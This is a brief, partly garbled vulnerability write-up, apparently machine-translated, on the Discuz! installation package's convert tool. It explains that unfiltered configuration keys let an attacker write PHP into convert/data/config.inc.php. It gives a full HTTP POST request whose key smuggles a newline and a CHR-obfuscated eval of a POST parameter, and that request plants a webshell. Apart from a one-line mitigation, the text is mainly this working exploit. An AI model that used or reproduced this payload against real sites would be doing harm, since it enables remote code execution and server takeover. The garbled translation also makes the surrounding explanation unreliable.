Discuz! A built-in tool may cause webshell due to improper use

Discuz! A built-in tool may cause webshell due to improper use. In addition, after investigation, the number of users is large. Discuz! The installation package contains a conversion tool convert. Due to security issues, you can use the shell to usually have the website directory convert or utility/convert. After investigation, the number of converts is large. Before using this tool, you can use the data directory to write data. Analysis: Save the configuration in utility \ convert \ include \ do_config.inc.php and track the save_config_file utility \ convert \ include \ global. func. php Analysis Method: getvars and buildarray can be seen that the key is filtered only before getvars, but the key is not filtered at all. When you can directly use shell ON when GPC is OFF,

if($level == 0) {$newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);$return .= "\r\n// $newline //\r\n";}

 

The initial letter is also written to the file. We only need to add a line break to the key to implement the shell writing method:

POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Length: 199Content-Type: application/x-www-form-urlencodednewconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

 

You can write a shell with the shell address convert/data/config. inc. php. Solution:Modify the program or delete it after use.